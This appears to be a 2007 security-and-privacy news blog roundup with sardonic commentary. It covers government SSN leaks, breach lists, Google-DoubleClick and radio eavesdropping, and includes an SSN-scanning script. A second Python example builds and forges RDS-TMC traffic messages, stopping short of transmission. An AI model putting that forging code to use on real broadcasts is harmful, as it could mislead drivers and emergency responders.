Today's theme seems to be “Trust us! We're your government!”
Ignorance is bliss. That's a “law” that needs changing.
U.S. Exposed Personal Data
Census Bureau Posted 63,000 Social Security Numbers Online
By Ellen Nakashima Washington Post Staff Writer Saturday, April 21, 2007; A05
For more than a decade, the Census Bureau posted on a public Web site the Social Security numbers of 63,000 people who received financial aid, officials said yesterday. The apparent violation of federal privacy law prompted concerns about identity theft.
Government officials removed the data from the Web site on April 13, the day they were alerted to the breach by an Illinois farmer [“We're the Census Bureau, we don't know what's on our website!” Bob] who discovered the numbers while surfing the Internet. They did not publicize the matter until yesterday, saying they needed the delay to enable information-security officials to contact those whose numbers were revealed and to contact "at least a half-dozen" mirror sites.
"We take full responsibility for this and offer no excuses for it," said Terri Teuber, a spokeswoman for the U.S. Department of Agriculture. "We absolutely do not think it was appropriate."
A watchdog group countered that officials tried to suppress the news.
"The bottom line is the government screwed up," said Gary Bass, executive director of OMB Watch. "What's really important is that they now try to rectify the problem. Thousands of research groups have copies of this site."
... Teuber said the USDA had been using Social Security numbers as part of a 15-digit federal contract identifier number. The practice dates back more than 25 years, she said, to when Social Security numbers were printed on checks. She said the USDA's information-security division was not aware of this continuing practice until last week. [First: Take an inventory! Bob]
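Bob's "take an inventory" point, worked through as an added example (written for this page, not code from the USDA or the Census Bureau). The article says only that the SSN was embedded in a 15-digit contract identifier, so the `YY-AAA-GG-SSSS-NNNN` layout below is an assumption, the sample records are constructed, and the structural SSN rules are the pre-2011 ones that applied to this data. The discovery pass deliberately over-matches (ZIP+4 and long numeric IDs will trip it) so that a person triages fields; the verification pass then extracts and tokenizes the SSN once a field's layout is known.

```python
"""Added example: find SSNs hiding inside records and identifiers.

Discovery pass: flag any field containing a 9-digit window that passes the
(pre-2011) structural SSN rules. Verification pass: once a field's layout is
known, pull the SSN out of its fixed position and replace it with a keyed
token. The contract-identifier layout is an assumption for illustration.
"""
from __future__ import annotations

import hmac
import re
from dataclasses import dataclass

# Areas 000, 666 and 900-999 were never issued before randomisation in 2011;
# group 00 and serial 0000 are never valid.
INVALID_AREAS = frozenset({0, 666}) | frozenset(range(900, 1000))


def is_plausible_ssn(digits: str) -> bool:
    """Structural check only: a cheap filter for discovery, not proof of an SSN."""
    if len(digits) != 9 or not digits.isdigit():
        return False
    area, group, serial = int(digits[:3]), int(digits[3:5]), int(digits[5:])
    return area not in INVALID_AREAS and group != 0 and serial != 0


def ssn_windows(value: str):
    """Yield every 9-digit window of every digit run (spaces/hyphens stripped),
    so an SSN embedded in a longer identifier is still seen."""
    for run in re.findall(r"\d(?:[ -]?\d)+", value):
        digits = re.sub(r"[ -]", "", run)
        for i in range(len(digits) - 8):
            yield digits[i:i + 9]


@dataclass(frozen=True)
class Finding:
    field: str
    windows: int  # plausible 9-digit windows; >1 means a longer number is involved


def scan_record(record: dict[str, str]) -> list[Finding]:
    """Discovery pass over one record; over-matches on purpose so a human can
    triage which fields really carry SSNs."""
    findings = []
    for field, value in record.items():
        n = sum(1 for w in ssn_windows(value) if is_plausible_ssn(w))
        if n:
            findings.append(Finding(field, n))
    return findings


# Assumed (hypothetical) layout: YY-AAA-GG-SSSS-NNNN, i.e. the SSN occupies
# digits 3..11 of the 15-digit identifier once separators are removed.
CONTRACT_ID = re.compile(r"^(\d{2})-(\d{3})-(\d{2})-(\d{4})-(\d{4})$")


def ssn_in_contract_id(contract_id: str) -> str | None:
    """Verification pass for a field whose layout is known."""
    m = CONTRACT_ID.match(contract_id)
    if not m:
        return None
    ssn = m.group(2) + m.group(3) + m.group(4)
    return ssn if is_plausible_ssn(ssn) else None


def tokenize_contract_id(contract_id: str, key: bytes) -> str:
    """Replace the embedded SSN with a keyed, deterministic token so the
    identifier stays unique for joins but no longer carries the SSN."""
    m = CONTRACT_ID.match(contract_id)
    ssn = ssn_in_contract_id(contract_id)
    if m is None or ssn is None:
        return contract_id
    token = hmac.new(key, ssn.encode(), "sha256").hexdigest()[:10]
    return f"{m.group(1)}-T{token}-{m.group(5)}"


# Constructed sample records; no real people, contracts or addresses.
SAMPLE_RECORDS = [
    {"contract_id": "07-123-45-6789-0015", "zip4": "80202-1234",
     "awarded": "2007-04-13", "amount": "4500.00"},
    {"contract_id": "07-000-00-0000-0025", "zip4": "80202",
     "awarded": "2006-11-02", "amount": "12000.00"},
]


def inventory(records) -> dict[str, int]:
    """Field name -> number of records in which that field tripped the scan."""
    counts: dict[str, int] = {}
    for rec in records:
        for f in scan_record(rec):
            counts[f.field] = counts.get(f.field, 0) + 1
    return counts


if __name__ == "__main__":
    print(inventory(SAMPLE_RECORDS))
    for rec in SAMPLE_RECORDS:
        cid = rec["contract_id"]
        print(cid, "->", tokenize_contract_id(cid, b"demo-key"))
```

Run it over an export of each system's tables and the `inventory` counts tell you which fields need a layout check; a field that matches on every record is almost certainly an identifier scheme like the one the USDA described, and the tokenizer shows one way to retire the SSN from it without breaking joins.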
Ignorance is commonplace...
Los Alamos warns workers about identity theft
Personal data of NMSU students posted online
By SUE MAJOR HOLMES Associated Press April 20, 2007
ALBUQUERQUE, N.M. (AP) - Los Alamos National Laboratory warned employees about protecting themselves against identity theft after the names and Social Security numbers of 550 lab workers were posted on a Web site run by a subcontractor working on a security system.
An April 5 letter to the employees from Jan A. Van Prooyen, the lab's acting deputy director, said the problem was discovered the previous week when a lab employee happened upon the Web site [Apparently, managers are genetically incapable of finding problems. Bob] of a software services company that had been hired years before.
Clicking a link and entering a password provided online [Now there's a “security technique” you seldom see... Bob] led to a table that included names, and in some cases, Social Security numbers, of people who entered certain lab sites around 1998, the letter said.
Van Prooyen said the lab wasn't aware of "this unauthorized use" of personal information until March 28, and that the former subcontractor removed the information that afternoon after the lab contacted the company.
... Van Prooyen's letter said the lab did not know how long the information had been online. [What records? Bob] However, it said the information wasn't likely to have been misused given that it was buried within the Web site, the site did not appear to have been widely accessed and the subcontractor's business had not been active for about two years.
Ignorance is widespread. (Somehow it looks more impressive when you summarize the whole week in one article...)
Data “Dysprotection:” Friday Roundup
Friday April 20th 2007, 6:52 pm
A quick recap of some of the breaches and follow-ups we reported in the news section this week:
At least 60 customers of Albertson’s Supermarket in San Lorenzo had their identities stolen and bank accounts raided by thieves who used a credit card skimmer. By the end of the week, authorities reported that another Albertson’s had also been compromised the same way.
The University of Pittsburgh Medical Center disclosed that a second set of patient data containing patient names, Social Security numbers, X-rays and other personal medical information had been found on UPMC’s web site and in the Internet Archives. This was in addition to the 80 patients previously reported to have been found on both the web and in the Internet Archives. Not a great week for UPMC.
When the Washington Post exposed the fact that student loan companies were improperly accessing a national database with confidential information on tens of millions of students, the lenders were blocked from access.
New Horizons Community Credit Union (NHCCU) is notifying members of a potential breach of confidential member loan information after the theft of a laptop computer from Protiviti, “a consultant employed by Bellco Credit Union conducting due diligence [but having none themselves... Bob] to prepare a possible acquisition bid.” Anybody else see any irony in the firm doing due diligence managing to get their laptop stolen or am I just in a weird mood?
Ohio State University reported a “two-fer” on breaches this week: a hack compromised the personal information of 14,000 current and former faculty and staff members. Additionally, two laptop computers stolen from a professor’s home contained the SSN and grades of about 3500 chemistry students. And in case one set of the data wasn’t enough, the professor had just finished copying over all of the data from one laptop to the other.
A Los Angeles County laptop computer that contained names and SSN of 28 people enrolled in the Department of Social Services’ Refugee Employment Program was stolen.
An employee of Gerald Champion Regional Medical Center was found to be in possession of confidential employee information, including SSN and bank account information, even though he was not authorized to have that information. Hey, at least they know where their data are, unlike some of these other folks…
The Texas Attorney General filed suit against CVS/Caremark Corp. for putting as many as 1000 customers’ records in a dumpster behind one of its stores. This was the second such suit as the AG also filed against Radio Shack recently.
A man who stole hundreds of identities from patients whose accounts were handled by Hospital Billing & Collection Service Inc. was sentenced to six years and three months in prison today.
A man in prison for identity theft is accused of running a similar operation from behind bars. Gimme that good old-fashioned American ingenuity…
A computer file server containing research subject information, SSN, and medical details on 3000 cancer research participants was stolen from the University of California at San Francisco.
Valve Software, the company behind Counter Strike and Half Life, has been accused of covering up a hack of its servers which allegedly exposed the credit card details of thousands of its customers.
The names and SSN of more than 5,600 New Mexico State University students were accidentally posted on the school’s Web site for a few hours.
Los Alamos National Laboratory was back in the news this week: 550 lab employees were notified that their names and in some cases, SSN, had been on a web site for what appears to be at least two years.
The SSN of up to 150,000 people who received loans or other financial assistance from two Agriculture Department programs were disclosed for 26 years in a publicly available database. Officials at the Agriculture Department and the Census Bureau, which maintains the database, were notified last week by a farmer from Illinois, who stumbled across the database on the Internet.
Major mail-order Japanese retailer Japanet Takata Co. has filed a 110 million yen damages suit against a former employee who allegedly copied personal information on over half a million customers and then leaked it to outsiders.
In the UK, Lime Pictures exposed about 20,000 individuals’ personal details on its website in the form of completed job applications.
Also in the UK, about 100,000 customers of the broadband provider Bulldog appear to have had private details stolen.
But on a positive note:
Not one agency or business reporting a breach suggested that there was any chance that the information had been or even might be misused. (Note that I am struggling valiantly to type this with a straight face…)
Although the U.S. Dept. of Commerce reported that 33 computers were infected with data-stealing Trojans and other malware last year, no information is believed to have been stolen. Gotta stop opening those porn links at work, guys…
When does stupidity cross into gross negligence? Who should be talking to these people?
ISP Kicks Out User Who Exposed Vulnerability; Doesn't Fix Vulnerability
from the blame-the-messenger dept
Over the past few years, there have been plenty of examples of companies with security vulnerabilities blaming the messenger when the vulnerabilities are pointed out, often threatening them with time in jail. The end result, of course, is that many security researchers are afraid to report vulnerabilities, as they may be blamed for them. Of course, that doesn't mean that others haven't found the same vulnerabilities and started using them for malicious purposes. The latest such case is pointed out by Broadband Reports and involves an ISP in the UK called BeThere. Apparently, a college student discovered and published a pretty major vulnerability found in the routers the company uses, allowing anyone to access the routers remotely. Rather than thank the customer for finding and highlighting a pretty serious vulnerability, the company has cut off his service and threatened him with lawsuits. Oh yeah, they also haven't bothered to fix the vulnerability -- despite it being published 7 weeks ago. The reasoning from the ISP is astounding. They claim that since they can't find any evidence that anyone ever used the vulnerability, he must have discovered it by "illegal" means. Who knew that simply probing for security vulnerabilities was illegal? And, of course, the ISP told the guy he's not allowed to talk about its legal threat to him -- which isn't actually legally binding. It's not clear if the ISP doesn't understand what it's done or simply doesn't want to fix the vulnerability -- but the fact that it seems to think it's ok to leave the vulnerability there and just cut off the guy who pointed it out should make other customers of BeThere wonder about how the ISP treats their security.
While we're on the subject of ill-logic... Is this a case of: “We shoulda thought of this first?”
Google-DoubleClick Raise Red Privacy Flags
By Roy Mark April 20, 2007
UPDATED: Online privacy groups filed a complaint with the Federal Trade Commission (FTC) today seeking to block Google's $3.1 billion bid for online advertising firm DoubleClick unless the world's largest search engine agrees to greater consumer privacy protections.
The combination of Google and DoubleClick would combine two of the biggest players in online advertising. Google's AdSense business is algorithm-driven and based on clickable links, while DoubleClick's DART technology places targeted banners on popular online sites.
The complaint alleges if the deal is allowed to go unchecked, Google will have the unprecedented ability to "record, analyze, track and profile" the activities of Internet users, [Surely, they can do that now? Bob] a charge both Google and DoubleClick were quick to deny.
"Google's proposed acquisition of DoubleClick will give one company access to more information about the Internet activities of consumers than any other company in the world," [Surely, one company is number one today... Bob] the complaint states. "Moreover, Google will operate with virtually no legal obligation to ensure the privacy, security and accuracy of the personal data that it collects." [but not because of this merger... Bob]
The groups also complain that at least some of the data is personally identifiable.
But DoubleClick insisted in a statement, "Any and all information collected by DoubleClick is, and will remain, the property of the company's clients. Ownership rights, like the other terms of DoubleClick's client contracts, will be unaffected by any acquisition."
The privately held DoubleClick added, "Google would not be able to match its search data to the data collected by DoubleClick, as DoubleClick does not have the right to use its clients' data for such purposes." [This is based on the Privacy statement, not a technical barrier. Changing the Privacy statement is as simple as uploading a new page. Bob]
Nicole Wong, Google's deputy general counsel, issued a statement calling the complaint "unsupported by the facts and the law." Wong said the complaint "utterly fails to identify any practice that does not comply with accepted privacy standards."
The Electronic Privacy Information Center (EPIC), the Center for Democracy and Technology (CDT) and the U.S. Public Interest Research Group (U.S. PIRG) want DoubleClick to remove user-identified cookies and "other persistent pseudonymic" identifiers from all corporate records and databases prior to any transfer to Google.
The groups also want the FTC to require Google to publicly present a plan to comply with government and industry privacy standards as a condition of the deal. [Most interesting! Who does that now? Bob] In addition, they are seeking to force Google to establish a meaningful data destruction policy and offer consumers "reasonable access" to all personally identifiable data held by the company.
According to the complaint, "Absent injunctive relief [by the FTC]…other companies will be encouraged to collect large volumes of information from consumers in an unfair, disproportionate and deceptive manner." [How? Bob]
When the deal was announced late last week, DoubleClick CEO David Rosenblatt said, "Google is the absolute perfect partner for us. Combining DoubleClick's cutting edge digital solutions for both media buyers and sellers with Google's scale and …resources will bring tremendous value to both our employees and clients."
Google co-founder Sergey Brin added, "Together with DoubleClick, Google will make the Internet more efficient for end users, advertisers and publishers."
The market was unimpressed with the privacy groups' FTC complaint. In late afternoon trading, Google shares were up almost $15 to $486.70.
If the deal is approved, it will close by the end of the year.
Tools & Techniques Not new, but an interesting question: Is it 'wiretapping' when you are 'broadcasting'?
Friday, April 20, 2007
Seeing through walls
Have you considered that someone could be reading what's on your monitor from a few rooms away? It's unlikely, but possible, as work by Cambridge University computer security researcher Markus Kuhn shows.
A radio antenna and radio receiver - equipment totalling less than £1000 - is all you need. Kuhn managed to grab the image to the left through two intermediate offices and three plasterboard walls.
Back in 1985, Wim Van Eck proved it was possible to tune into the radio emissions produced by electromagnetic coils in a CRT display and then reconstruct the image. The practice became known as Van Eck Phreaking.
... CRTs are now well on the way to being history. But Kuhn has shown that eavesdropping is possible on flat panel displays too.
... Kuhn also mentioned that one laptop was vulnerable because it had metal hinges that carried the signal of the display cable. I asked if you could alter a device to make it easier to spy on. "There are a lot of innocuous modifications you can make to maximise the chance of getting a good signal," he told me. For example, adding small pieces of wire or cable to a display could make a big difference.
... For another cool security demonstration by Kuhn, check out this story on decoding the flicker a monitor casts on the walls.
How to steer customers to your storefront... (or screw up first responders, etc.)
Don't let your navigation system fool you
By Joris Evers Story last modified Fri Apr 20 15:46:46 PDT 2007
VANCOUVER, B.C.--That roadblock alert on your navigation system may not be real. Neither may that warning for a "terrorist incident," an "air raid" or a "bullfight."
Two Italian hackers have figured out how to send fake traffic information to navigation systems that use a data feature of FM radio for real-time traffic information. Using cheap, off-the-shelf hardware, they can broadcast traffic data that will be picked up by cars in about a one-mile radius, the hackers said during a presentation at the CanSecWest event here.
"We can create queues, bad weather, full car parks, overcrowded service areas, accidents, roadwork and so on," said Andrea Barisani, chief security engineer at Inverse Path, a security company. "Traffic information displayed on satellite navigation systems is trusted by drivers. Normal people do not think that you can do nasty things."
Barisani and hardware hacker Daniele Bianco discovered that the system used by many navigation aides to get traffic data isn't secured. [Planning! Bob] The data is sent using the Traffic Message Channel (TMC) of the Radio Data System (RDS), a standard way of transmitting data over FM radio also used to display station names and program titles.
... The hackers wrote a program to decode the RDS data. "As far as we know it is the first open-source tool that tries to fully decode RDS information," Barisani said. They then figured out how to create their own TMC messages and broadcast those using an RDS encoder, an FM transmitter, an antenna and some other tools.
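To make Bob's "Planning!" point concrete, here is an added example (written for this page; it is not Barisani and Bianco's tool) of the two things their attack rests on: the RDS block code and the single-group ALERT-C (RDS-TMC) message that rides in a type 8A group. Each 26-bit block is 16 data bits plus a 10-bit checkword, which is a CRC XORed with a fixed offset word. That checkword lets a receiver detect bit errors and tell the four blocks apart, but anyone can compute it, and nothing else in the group authenticates the sender. The field layout follows the RDS and ALERT-C standards; the PI code, event and location values are arbitrary placeholders, not entries from the real TMC tables.

```python
"""Added example (not the researchers' code): RDS block coding and an
ALERT-C (RDS-TMC) type 8A group, to show that a forged traffic message
verifies exactly like a broadcaster's own. PI, event and location values
are placeholders chosen for illustration."""
from __future__ import annotations

RDS_POLY = 0x5B9  # g(x) = x^10 + x^8 + x^7 + x^5 + x^4 + x^3 + 1
OFFSET_WORDS = {"A": 0x0FC, "B": 0x198, "C": 0x168, "C'": 0x350, "D": 0x1B4}


def rds_crc(info: int) -> int:
    """Remainder of info(x) * x^10 modulo g(x), bit-serial over a 26-bit register."""
    reg = info << 10
    for bit in range(25, 9, -1):
        if (reg >> bit) & 1:
            reg ^= RDS_POLY << (bit - 10)
    return reg & 0x3FF


def encode_block(info: int, offset: str) -> int:
    """26-bit block: 16 info bits followed by (CRC XOR offset word)."""
    return (info << 10) | (rds_crc(info) ^ OFFSET_WORDS[offset])


def decode_block(block: int) -> tuple[int, str] | None:
    """(info, offset name) if the checkword is consistent with some offset word,
    else None. Passing this check says nothing about who transmitted the block."""
    info, check = block >> 10, block & 0x3FF
    syndrome = check ^ rds_crc(info)
    for name, word in OFFSET_WORDS.items():
        if syndrome == word:
            return info, name
    return None


def build_tmc_group(pi: int, tp: int, pty: int, event: int, location: int,
                    extent: int = 0, direction: int = 0, diversion: int = 0,
                    duration: int = 0) -> list[int]:
    """Single-group ALERT-C user message (group type 8A) as four encoded blocks.
    Block 2: type 8, version A, TP, PTY, T=0 (user message), F=1 (single group), DP.
    Block 3: diversion bit, direction bit, extent (3 bits), event code (11 bits).
    Block 4: location code (16 bits)."""
    if not (0 <= event < 2048 and 0 <= location < 65536 and 0 <= extent < 8):
        raise ValueError("field out of range")
    block2 = (8 << 12) | (tp << 10) | (pty << 5) | (1 << 3) | (duration & 0x7)
    block3 = (diversion << 15) | (direction << 14) | (extent << 11) | event
    return [encode_block(pi, "A"), encode_block(block2, "B"),
            encode_block(block3, "C"), encode_block(location, "D")]


def parse_tmc_group(blocks: list[int]) -> dict | None:
    """Receiver side: every checkword must verify and the offsets must read A,B,C,D."""
    decoded = [decode_block(b) for b in blocks]
    if len(decoded) != 4 or None in decoded:
        return None
    (pi, o1), (b2, o2), (b3, o3), (loc, o4) = decoded
    if (o1, o2, o3, o4) != ("A", "B", "C", "D"):
        return None
    if (b2 >> 12) != 8 or (b2 >> 11) & 1 or (b2 >> 4) & 1:
        return None  # not 8A, or T=1 (tuning info rather than a user message)
    return {"pi": pi, "tp": (b2 >> 10) & 1, "pty": (b2 >> 5) & 0x1F,
            "single_group": bool((b2 >> 3) & 1), "duration": b2 & 7,
            "diversion": (b3 >> 15) & 1, "direction": (b3 >> 14) & 1,
            "extent": (b3 >> 11) & 7, "event": b3 & 0x7FF, "location": loc}


def forge_like(captured: list[int], event: int, location: int) -> list[int]:
    """Attacker side: copy PI/TP/PTY from a captured 8A group and re-encode with
    a chosen event and location; the result verifies exactly like the original."""
    msg = parse_tmc_group(captured)
    if msg is None:
        raise ValueError("captured group is not a valid 8A message")
    return build_tmc_group(msg["pi"], msg["tp"], msg["pty"], event, location, extent=2)


if __name__ == "__main__":
    real = build_tmc_group(pi=0xC201, tp=1, pty=2, event=100, location=1500)
    fake = forge_like(real, event=1700, location=1500)
    print("broadcast:", parse_tmc_group(real))
    print("forged   :", parse_tmc_group(fake))
```

The receiver's only integrity check is `decode_block`, and a single flipped bit fails it, so the code is doing its job against noise; the trouble is that `forge_like` satisfies it just as well as the station does, because there is no key on either side. Feeding these 26-bit blocks to an RDS encoder and FM transmitter is the part the page describes and this example leaves out.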
Perhaps we are becoming (or always were) a nation of voyeurs?
Analyst: Web 2.0 Users Would Rather Watch Than Upload
By John P. Mello Jr. TechNewsWorld 04/20/07 8:00 AM PT
New findings by Hitwise suggest the great majority of Web 2.0 users are the online equivalent of couch potatoes. Among visitors to sites that encourage active participation from users in the form of editing or uploading content, only a tiny fraction of visitors typically do so -- most are just observers.
The so-called "New Web" has been hailed as a great place for sharing and interacting, but data released Tuesday by Internet traffic researchers suggests most cybersurfers are watchers, not uploaders.
In a presentation at the Web 2.0 Expo in San Francisco this week, Hitwise analyst Bill Tancer noted that upload rates at participatory cyberstops like YouTube and Flickr were well under 1 percent -- 0.16 percent for video-sharing site YouTube and 0.2 percent for photo-sharing site Flickr, which is owned by Yahoo.
The Hitwise findings beg the question, is the Web moving the realm of the couch potato from the living room into Cyberspace?
"Web 2.0 is to the Internet what the remote was to TV," Jaron Lanier a scholar-in-residence at the University of California at Berkeley and a pioneer in virtual reality research, told TechNewsWorld. "It encourages skittish attention deficit behavior."
80 Percent Watchers
By and large, most visitors to participatory Web sites are watchers, maintained Randall C. Bennett, former lead blogger for DV Guru and founder of Tech Check Daily, a daily video podcast about technology.
As a rule of thumb, he estimated that about 1 percent of a site's visitors are "creatives" -- enthusiastic and frequent uploaders of site content; some 20 percent are "contributors" who might do some uploading and add comments and tags to a site's content; and the rest of the visitors are just watchers.
"They're the kind of people who use Wikipedia just because the information is useful to them," he exemplified.
Ironically, Wikipedia, the online encyclopedia written and edited by volunteers, had a relatively high participation rate in the Hitwise findings -- 4.49 percent of visitors edited entries at the site.
"I'm not surprised that the percentage of people who upload videos is much smaller than the percentage of people who watch them," John Battelle, a Web marketing analyst with Battelle Media told TechNewsWorld.
"But I don't think the act of watching on the Web is necessarily passive," he added. "You're watching a conversation, which is different than watching a presentation."
For example, he explained that many visitors to a video-sharing Web site aren't just looking at a video. They're looking at related videos, responses to video, commentary on videos and so forth.
"It's a conversational dynamic as opposed to a receiving dynamic," he observed.
That conversational dynamic inherent in Web 2.0 appears even at sites that limit user uploads.
Jeffrey D. Neuburger, chairman of the technology, media and communication department at the law firm of Thelen Reid Brown Raysman & Steiner, cited a major record company that has moved all its talent acquisition operations to the Web.
"It's like American Idol," he told TechNewsWorld. "Artists upload their music and videos, but the public can post comments on them so the A&R (artist and repertoire) people can actually get a sense of what the public thinks about the content before they approach an artist."
Even if participation rates at Web 2.0 sites remain low, visitors continue to flock to the cyberstops, according to Hitwise. Its presentation showed that in the last two years, visits to the top participatory Web sites increased 668 percent.
Other findings in the Hitwise presentation included:
Visits to Wikipedia outnumber visits to Microsoft's Encarta encyclopedia site 3,400 to 1.
Biggest users of Wikipedia are 18- to 24-year-olds (25.89 percent) and 35- to 44-year-olds (25.53 percent), while most of the editing of the encyclopedia is being done by 35- to 44-year-olds (27.35 percent), 45- to 54-year-olds (28.85 percent) and the over-55 set (25.59 percent).
Web 2.0 photo sites account for 56 percent of all photo site traffic on the Internet.
Most YouTube visitors are 18- to 24-year-olds (30.55 percent), while most video is uploaded to the site by 35- to 44-year-olds (35.65 percent).
So who watches the watchers?
YouTube to collect user data
Posted by Greg Sandoval April 20, 2007 11:16 AM PDT
YouTube, the Internet's No. 1 video warehouse, is gearing up to collect user data that could prove valuable to marketers, according to the company's chief marketing officer.
Suzie Reider, YouTube's chief marketing officer, told an audience at the Advertising Research Foundation's Rethink conference this week that YouTube will launch in a few weeks its first user study, according to trade publication Advertising Age.
"By Q3, we'll have a tremendous amount of metrics and data around every video," Reider told the audience. "There's lots you can glean from looking at who's looking at what. ["You can observe a lot just by watchin'." Yogi Berra Bob] It's a real-time focus group that happens all day, every day."
More than 34 million U.S. residents visit YouTube each month, according to ComScore Networks.
Good on ya', Annie Oakley! (In the old days, women were TUFF!)
One tough beauty queen
Venus Ramey, 82, shoots tire, stops intruders
BY KIMBALL PERRY KPERRY@ENQUIRER.COM
Venus Ramey has earned lots of fame in her 82 years.
She was Miss America 1944 and later a candidate for Cincinnati City Council and worked to save Over-the-Rhine's historic buildings. She performed on Broadway and in movies.
Now, though, she's in the news for another reason.
After confronting a man she said was stealing from her Kentucky farm, Ramey pulled out a gun and shot out a tire on his truck so he couldn't leave, allowing police to arrest him and two others.
"He was probably wetting his pants," Ramey said Thursday from her home in Waynesburg, about 140 miles south of Cincinnati.
Ramey was on her Lincoln County farm last week - "Friday the 13th, apropos date, isn't it?" she noted Thursday - feeding a horse when she saw her dog run to a nearby building where she stores old steel-shaping machines, lathes and other equipment.
"This stuff is over 100 years old," she said.
For some time, thieves had been breaking into the building to steal the machines to sell for scrap. She hadn't been able to catch anyone in the act until last week.
She drove over to the building and blocked the truck sitting there.
When she asked a man what he was doing, he replied "scrapping," and said he would leave.
"I said, 'Oh, no you won't,' and I shot their tires so they couldn't leave," Ramey said.
She had to balance on her walking stick as she pulled out a snub-nosed .38-caliber handgun.
"I didn't even think twice. I just went and did it. If they'd even dared come close to me, they'd be 6 feet under by now."
Ramey then tried to flag down people driving by. When one stopped, she asked them to call 911. Eventually, three people were arrested - one at the scene and two others walking on a nearby road.
"They've been stealing from me for years. Those good-for-nothing slobs," she said.